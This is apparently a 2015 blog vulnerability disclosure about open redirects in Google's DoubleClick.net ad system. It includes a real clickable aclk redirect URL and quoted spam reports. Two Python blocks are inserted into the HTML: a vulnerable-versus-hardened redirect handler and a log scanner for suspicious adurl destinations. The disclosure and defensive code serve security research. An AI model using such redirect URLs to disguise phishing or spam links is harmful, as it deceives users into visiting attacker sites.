<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<a href="http://blog.163.com/greensun_2006/blog/static/1112211220155565419870/"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://blog.163.com/greensun_2006/blog/static/1112211220155565419870/</span></a></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<a href="http://aibiyi.blogspot.com/2015/06/yahoo-open-redirect.html"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://aibiyi.blogspot.com/2015/06/yahoo-open-redirect.html</span></a></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<a href="https://www.facebook.com/tetraph/posts/1659455054274454"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">https://www.facebook.com/tetraph/posts/1659455054274454</span></a></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<a href="http://www.inzeed.com/kaleidoscope/computer-web-security/yahoo-and-yahoo-japan-may-be-vulnerable-to-spams/"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://www.inzeed.com/kaleidoscope/computer-web-security/yahoo-to-spams/</span></a></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><a href="http://www.tetraph.com/blog/spamming/yahoo-url-redirection/">http://www.tetraph.com/blog/spamming/yahoo-url-redirection/</a></span></div>
</div>
2015-06-05T01:25:00.000-07:00 Google DoubleClick Website System Could be Used by Spammers<div class="">
<div class="im">
<div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh5B7UfI5X73RhQsdKVGa5LdpniYa8L4-MvWDpJYHhWUIWJ2Max2UwwR7Zy8zjJ4hGUBVC3S4OMbWd99773mj6FBpvK0w85r9-IVv2v6QWLx27q5Ic1yTpS8QinEBR5VOqvXXu_88gD1wke/s1600/google_1558926c.jpg" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="250" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh5B7UfI5X73RhQsdKVGa5LdpniYa8L4-MvWDpJYHhWUIWJ2Max2UwwR7Zy8zjJ4hGUBVC3S4OMbWd99773mj6FBpvK0w85r9-IVv2v6QWLx27q5Ic1yTpS8QinEBR5VOqvXXu_88gD1wke/s400/google_1558926c.jpg" width="400" /></a></div>
<div class="separator" style="clear: both; margin: 0px; text-align: center;">
<br /></div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif; font-size: small;"><b style="background-color: white;"><br /></b></span></div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif; font-size: small;"><b style="background-color: white;">Google DoubleClick.net (Advertising) System URL Redirection Vulnerabilities Could Be Used by Spammers</b></span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;"><br /></span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;"><br /></span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"><span style="font-size: small;"><br /></span></span></div>
<div>
<div style="margin: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;">Although
Google does not include Open Redirect vulnerabilities in its bug bounty
program, its preventive measures against Open Redirect attacks have
been quite thorough and effective to date.</span></div>
<div style="margin: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;"><br /></span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;"><br /></span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"><span style="font-size: small;">However, Google might have overlooked the security of its DoubleClick.net advertising
system. After some testing, it was found that most of the redirection URLs
within DoubleClick.net are vulnerable to Open Redirect attacks.
Many redirections are likely to be affected. </span>This could allow a
user to create a specially crafted URL that, if clicked, would redirect a
victim from the intended legitimate web site to an arbitrary web site
of the attacker's choosing. Such attacks are useful because the crafted URL
initially appears to be a web page of a trusted site. This could be
leveraged to direct an unsuspecting user to a web page containing
attacks that target client-side software such as a web browser or
document rendering programs.</span></div>
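<div style="margin: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;">The redirect pattern described above, as an added example that is not code from the original post or from Google's systems: a Python handler that passes the adurl parameter straight into the Location header (the vulnerable form) beside a hardened version that only allows absolute http(s) URLs whose host is on a fixed allow-list. The allow-list contents and the function names are assumptions made for the demonstration; the refused destination in the usage is the post's own POC target.</span></div>

```python
from typing import Optional
from urllib.parse import urlsplit, urlunsplit

# Hosts this redirector may send a visitor to. Constructed sample policy:
# in a real ad system this would be the landing hosts registered for the
# advertiser, never something derived from the request itself.
ALLOWED_HOSTS = {"www.sharp-world.com", "economics.wj.com"}


def redirect_unchecked(adurl: str) -> str:
    """The vulnerable form: whatever arrives in adurl becomes the Location
    header, so any attacker-supplied destination is accepted."""
    return adurl


def safe_redirect_target(adurl: str, allowed_hosts=ALLOWED_HOSTS) -> Optional[str]:
    """The hardened form: return a canonical redirect URL, or None when the
    redirect must be refused. The caller renders an error page on None and
    must never fall back to the raw parameter."""
    adurl = adurl.strip()
    # Refuse control characters before parsing: the parser itself drops
    # CR/LF/TAB, which would otherwise let a header-injection payload through.
    if any(ord(c) < 0x20 for c in adurl):
        return None
    try:
        parts = urlsplit(adurl)
        host = parts.hostname  # lower-cased; userinfo and port removed
        port = parts.port      # raises ValueError on a malformed port
    except ValueError:
        return None
    # Only absolute http(s) URLs qualify; this also rejects scheme-relative
    # forms such as //evil.example and javascript: URLs.
    if parts.scheme not in ("http", "https") or not host:
        return None
    host = host.rstrip(".")  # "example.com." is the same host as "example.com"
    # Exact host match, not a substring or suffix test: using .hostname means
    # "http://www.sharp-world.com@evil.example/" is seen as evil.example.
    if host not in allowed_hosts:
        return None
    netloc = host if port is None else f"{host}:{port}"
    # Rebuild from the parsed pieces so the Location header carries exactly
    # the host that was checked; the fragment is dropped.
    return urlunsplit((parts.scheme, netloc, parts.path or "/", parts.query, ""))


if __name__ == "__main__":
    # The POC destination from the post is accepted by the unchecked handler
    # and refused by the allow-listed one.
    print(redirect_unchecked("http://www.tetraph.com/security"))
    print(safe_redirect_target("http://www.tetraph.com/security"))
    print(safe_redirect_target("http://www.sharp-world.com/igzo"))
```

<div style="margin: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;">Returning None instead of the raw parameter is the important design choice: every parsing failure lands on the refuse side. A downstream filter that merely trusts any URL under a doubleclick.net host would still be fooled, which is the Covert Redirect situation the post describes.</span></div>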
<div style="margin: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;"><br /></span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;"><br /></span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;">These redirections can be easily used by spammers, too.</span></div>
<div style="margin: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;"><br /></span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;"><br /></span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"><span style="font-size: small;">Some URLs belonging to Googleads.g.Doubleclick.net are also
vulnerable to Open Redirect attacks, while Google prevents similar
URL redirections elsewhere. Attackers can use URLs related to Google Account to make the attacks more powerful.</span></span></div>
<div style="margin: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;"><br /></span></div>
</div>
</div>
<div>
<div style="margin: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;"><br /></span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;">Moreover,
these vulnerabilities can be used to attack other companies such as
Google, eBay, The New York Times, Amazon, GoDaddy, Yahoo and Netease,
for example by bypassing their Open Redirect filters (Covert Redirect).</span></div>
<div style="margin: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;"><br /></span></div>
<div style="margin: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;"><br /></span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;"><br /></span></div>
<div style="margin: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;"><br /></span></div>
</div>
<div>
<div style="line-height: 20.7900009155273px;">
<div style="line-height: 28px; margin: 0px; padding: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;">Discoverer and Reporter:</span></div>
</div>
<div>
<div style="margin: 0px; padding: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"><span style="font-size: small;"><span style="line-height: 17.8181819915772px; text-align: justify;">Jing Wang, </span><span style="line-height: 17.8181819915772px; text-align: justify;">Division of Mathematical Sciences (MAS), </span><span style="line-height: 17.8181819915772px; text-align: justify;">School of Physical and Mathematical Sciences (SPMS), </span><span style="line-height: 17.8181819915772px; text-align: justify;">Nanyang Technological University (NTU), </span><span style="text-align: justify;"><span style="line-height: 17.8181819915772px;">Singapore. (</span><a href="https://twitter.com/justqdjing/status/534330655891419136">@justqdjing</a><span style="line-height: 17.8181819915772px;">)</span></span></span><a href="http://www.tetraph.com/wangjing/" style="line-height: 28px; text-align: justify;"><br />http://www.tetraph.com/<wbr></wbr>wangjing/</a></span></div>
</div>
<div style="line-height: 20.7900009155273px;">
<div style="line-height: 28px; margin: 0px; padding: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;"><br /></span></div>
<div style="line-height: 28px; margin: 0px; padding: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;"><br /></span></div>
<div style="line-height: 28px; margin: 0px; padding: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;"><br /></span></div>
<div style="line-height: 28px; margin: 0px; padding: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;"><br /></span></div>
</div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif; font-size: small;"><b style="background-color: white;">(1) Background Related to Google DoubleClick.net.</b></span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;"><br /></span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;"><br /></span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif; font-size: small;"><b style="background-color: white;">(1.1) What is DoubleClick.net?</b></span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;"><br /></span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="background-color: white;"><span style="font-family: Arial, Helvetica, sans-serif; font-size: small;">"</span><span style="font-family: Arial, Helvetica, sans-serif;">DoubleClick
is a subsidiary of Google which develops and provides Internet ad
serving services. Its clients include agencies, marketers (Universal
McCann, AKQA etc.) and publishers who serve customers like Microsoft,
General Motors, Coca-Cola, Motorola, L'Oréal, Palm, Inc., Apple Inc.,
Visa USA, Nike, Carlsberg among others. DoubleClick's headquarters is in
New York City, United States.</span></span></div>
<div style="margin: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div style="margin: 0px;">
<span style="background-color: white;"><span style="font-family: Arial, Helvetica, sans-serif;">DoubleClick
was founded in 1996 by Kevin O'Connor and Dwight Merriman. It was
formerly listed as "DCLK" on the NASDAQ, and was purchased by private
equity firms Hellman & Friedman and JMI Equity in July 2005. In
March 2008, Google acquired DoubleClick for US$3.1 billion. Unlike many
other dot-com companies, it survived the dot-com bubble and focuses on
uploading ads and reporting their performance.</span><span style="font-family: Arial, Helvetica, sans-serif; font-size: small;">" (Wikipedia)</span></span></div>
<div style="margin: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;"><br /></span></div>
<div style="margin: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;"><br /></span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;"><br /></span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;"><br /></span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif; font-size: small;"><b style="background-color: white;">(1.2) Reports Related to Google DoubleClick.net Used by Spammers</b></span></div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif; font-size: small;"><b style="background-color: white;"><br /></b></span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;"><br /></span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;"><br /></span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif; font-size: small;"><b style="background-color: white;">(1.2.1)</b></span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;"><br /></span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;">Google DoubleClick.net has been used by spammers for a long time. The following is from a report in 2008.</span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;"><br /></span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;">"The
open redirect had become popular with spammers trying to lure users
into clicking their links, as they could be made to look like safe URLs
within Google's domain."</span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif; font-size: small;"><a href="https://www.virusbtn.com/blog/2008/06_03a.xml?comments" style="background-color: white;" target="_blank">https://www.virusbtn.com/blog/<wbr></wbr>2008/06_03a.xml?comments</a></span></div>
<div style="margin: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;"><br /></span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;"><br /></span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif; font-size: small;"><b style="background-color: white;">(1.2.2)</b></span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;"><br /></span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;">Mitechmate published a blog post related to DoubleClick.net spam in 2014.</span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;"><br /></span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;">"<a href="http://ad.doubleclick.net/" target="_blank">Ad.doubleclick.net</a> is
recognized as a perilous adware application that causes unwanted
redirections when surfing on the certain webpages. Actually it is
another browser hijacker that aims to distribute frauds to make
money. Commonly people pick up Ad.doubleclick virus when download
softwares, browse porn site or read spam email attachments. It enters
into computer sneakily after using computer insecurely. Ad.doubleclick.net is
not just annoying, this malware traces users' personal information,
which would be utilized for cyber criminal."</span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif; font-size: small;"><a href="http://blog.mitechmate.com/remove-ad-doubleclick-net-redirect-virus/" style="background-color: white;" target="_blank">http://blog.mitechmate.com/<wbr></wbr>remove-ad-doubleclick-net-<wbr></wbr>redirect-virus/</a></span></div>
<div style="margin: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;"><br /></span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;"><br /></span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif; font-size: small;"><b style="background-color: white;">(1.2.3)</b></span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;"><br /></span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;">Malwarebytes posted a news item related to DoubleClick.net malvertising in 2014.</span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;"><br /></span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;">"Large malvertising campaign under way involving DoubleClick and Zedo"</span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif; font-size: small;"><a href="https://blog.malwarebytes.org/malvertising-2/2014/09/large-malvertising-campaign-under-way-involving-doubleclick-and-zedo/" style="background-color: white;" target="_blank">https://blog.malwarebytes.org/<wbr></wbr>malvertising-2/2014/09/large-<wbr></wbr>malvertising-campaign-under-<wbr></wbr>way-involving-doubleclick-and-<wbr></wbr>zedo/</a></span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;"><br /></span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;"><br /></span></div>
<div style="margin: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;"><br /></span></div>
<div style="margin: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;"><br /></span></div>
<div style="margin: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;"><br /></span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;"><br /></span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif; font-size: small;"><b style="background-color: white;">(2) DoubleClick.net System URL Redirection Vulnerabilities Details.</b></span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;"><br /></span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="background-color: white;"><span style="font-family: Arial, Helvetica, sans-serif;">The
vulnerabilities can be exploited without user login. Tests were
performed on Microsoft IE (10.0.9200.16750) on Windows 8, Mozilla
Firefox (34.0) and Google Chromium 39.0.2171.65-0 ubuntu0.14.04.1.1064
(64-bit) on Ubuntu (14.04), and Apple Safari 6.1.6 on Mac OS X Lion 10.7.</span></span></div>
<div style="margin: 0px;">
<span style="background-color: white;"><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;"><br /></span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"><span style="font-size: small;">The webpage used for the following tests is "</span><a href="http://securitypost.tumblr.com/">http://securitypost.tumblr.com/</a>". We can suppose that this webpage is malicious.</span></div>
<div style="margin: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div style="margin: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;"><br /></span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;"><br /></span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;"><br /></span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif; font-size: small;"><b style="background-color: white;">(2.1) Vulnerable URLs Related to Googleads.g.Doubleclick.net.</b></span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;"><br /></span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;"><br /></span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif; font-size: small;"><b style="background-color: white;">(2.1.1)</b></span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;"><br /></span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"><span style="font-size: small;">Some URLs belonging to googleads.g.doubleclick.net are vulnerable to Open Redirect attacks, while Google prevents similar URL redirection elsewhere.</span></span></div>
</div>
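<div style="margin: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;">As an added example for the defender's side of the aclk URLs listed in this section (not code from the original post or from Google): a Python scan over proxy log lines that picks out DoubleClick aclk click-through requests, decodes their adurl parameter and flags destinations that are not among the advertiser hosts expected for the publisher id. The log format, the client addresses and the expected-host set are constructed for the demonstration, and the ai and sig parameter values are replaced by the placeholder EXAMPLE; the publisher id and the destinations are taken from the URLs in this section.</span></div>

```python
import re
from collections import Counter
from urllib.parse import parse_qs, urlsplit

# Constructed sample proxy log, not real traffic. Assumed line format:
#   <timestamp> <client-ip> <method> <url> <status>
SAMPLE_LOG = """\
2015-06-05T08:01:12Z 10.0.0.12 GET http://googleads.g.doubleclick.net/aclk?sa=L&ai=EXAMPLE&num=0&sig=EXAMPLE&client=ca-pub-0466582109566532&adurl=http://www.sharp-world.com/igzo 302
2015-06-05T08:01:40Z 10.0.0.12 GET http://www.sharp-world.com/igzo 200
2015-06-05T08:03:05Z 10.0.0.31 GET http://googleads.g.doubleclick.net/aclk?sa=L&ai=EXAMPLE&num=0&sig=EXAMPLE&client=ca-pub-0466582109566532&adurl=http%3A%2F%2Fwww.tetraph.com%2Fsecurity 302
2015-06-05T08:03:06Z 10.0.0.31 GET http://www.tetraph.com/security 200
2015-06-05T08:05:59Z 10.0.0.47 GET http://googleads.g.doubleclick.net/aclk?sa=L&ai=EXAMPLE&adurl=http://economics.wj.com 302
2015-06-05T08:07:10Z 10.0.0.58 GET http://www.google.com/ 200
"""

# Landing hosts the organisation expects behind this publisher id.
# Constructed sample policy; in practice this comes from the ad account.
EXPECTED_TARGETS = {"www.sharp-world.com", "economics.wj.com"}

LINE_RE = re.compile(r"^(\S+) (\S+) (\S+) (\S+) (\d{3})$")


def redirect_target(url):
    """Return the destination host named by adurl in a DoubleClick aclk
    click-through URL, or None when the URL is not such a redirect."""
    parts = urlsplit(url)
    host = (parts.hostname or "").lower()
    if not host.endswith(".doubleclick.net") or parts.path != "/aclk":
        return None
    # parse_qs percent-decodes, so an encoded adurl is handled the same way
    # as a bare one.
    adurl = parse_qs(parts.query).get("adurl", [None])[0]
    if adurl is None:
        return None
    return (urlsplit(adurl).hostname or "").lower() or None


def scan_log(text, expected=EXPECTED_TARGETS):
    """Scan log lines for aclk redirects. Returns (findings, counts): findings
    lists redirects whose destination is outside the expected host set, and
    counts tallies every observed destination host for review."""
    findings = []
    counts = Counter()
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # skip lines that do not fit the assumed format
        ts, client, _method, url, _status = m.groups()
        target = redirect_target(url)
        if target is None:
            continue
        counts[target] += 1
        if target not in expected:
            findings.append({"time": ts, "client": client, "target": target})
    return findings, counts


if __name__ == "__main__":
    found, tally = scan_log(SAMPLE_LOG)
    for f in found:
        print(f"{f['time']} {f['client']} redirected via aclk to {f['target']}")
    print(dict(tally))
```

<div style="margin: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;">The per-host tally is the part worth keeping even when nothing is flagged: a destination that appears once and is never a registered landing page is exactly the signal the spam reports quoted earlier describe. The scan does not check the sig parameter, since the post gives no information on what it covers.</span></div>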
<div>
<div style="margin: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;"><br /></span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;">Vulnerable URLs:</span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif; font-size: small;"><a href="http://googleads.g.doubleclick.net/aclk?sa=L&ai=CWEQH6Q73UqW9CMvMigfdiIGoB9rlksIEAAAQASAAUO7kr-b8_____wFgvwWCARdjYS1wdWItMDQ2NjU4MjEwOTU2NjUzMsgBBOACAKgDAaoEggFP0E-9agyjXkIfjOxmtpPE76hNCBn1in_meKMn53O-8ZFlbxWDgYdaVZQKJza8mIRXw22hWIVMAOJJzq-S6AipWHe9iVZCAAlcHj-gT2B33tD9a2oQrZ61S3-WFh_8T8RFUFnC_PRC35CTFbueQrUYjC-j6ncVXzt_IPXugo5vE-3x4AQBoAYV&num=0&sig=AOD64_2petJH0A9Zjj45GN117ocBukiroA&client=ca-pub-0466582109566532&adurl=http://www.sharp-world.com/igzo" style="background-color: white;" target="_blank">http://googleads.g.<wbr></wbr>doubleclick.net/aclk?sa=L&ai=<wbr></wbr>CWEQH6Q73UqW9CMvMigfdiIGoB9rlk<wbr></wbr>sIEAAAQASAAUO7kr-b8_____<wbr></wbr>wFgvwWCARdjYS1wdWItMDQ2NjU4MjE<wbr></wbr>wOTU2NjUzMsgBBOACAKgDAaoEggFP0<wbr></wbr>E-9agyjXkIfjOxmtpPE76hNCBn1in_<wbr></wbr>meKMn53O-<wbr></wbr>8ZFlbxWDgYdaVZQKJza8mIRXw22hWI<wbr></wbr>VMAOJJzq-S6AipWHe9iVZCAAlcHj-<wbr></wbr>gT2B33tD9a2oQrZ61S3-WFh_<wbr></wbr>8T8RFUFnC_PRC35CTFbueQrUYjC-<wbr></wbr>j6ncVXzt_IPXugo5vE-3x4AQBoAYV&<wbr></wbr>num=0&sig=AOD64_<wbr></wbr>2petJH0A9Zjj45GN117ocBukiroA&<wbr></wbr>client=ca-pub-<wbr></wbr>0466582109566532&adurl=http://<wbr></wbr>www.sharp-world.com/igzo</a></span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;"><br /></span></div>
</div>
<div>
<div style="margin: 0px;">
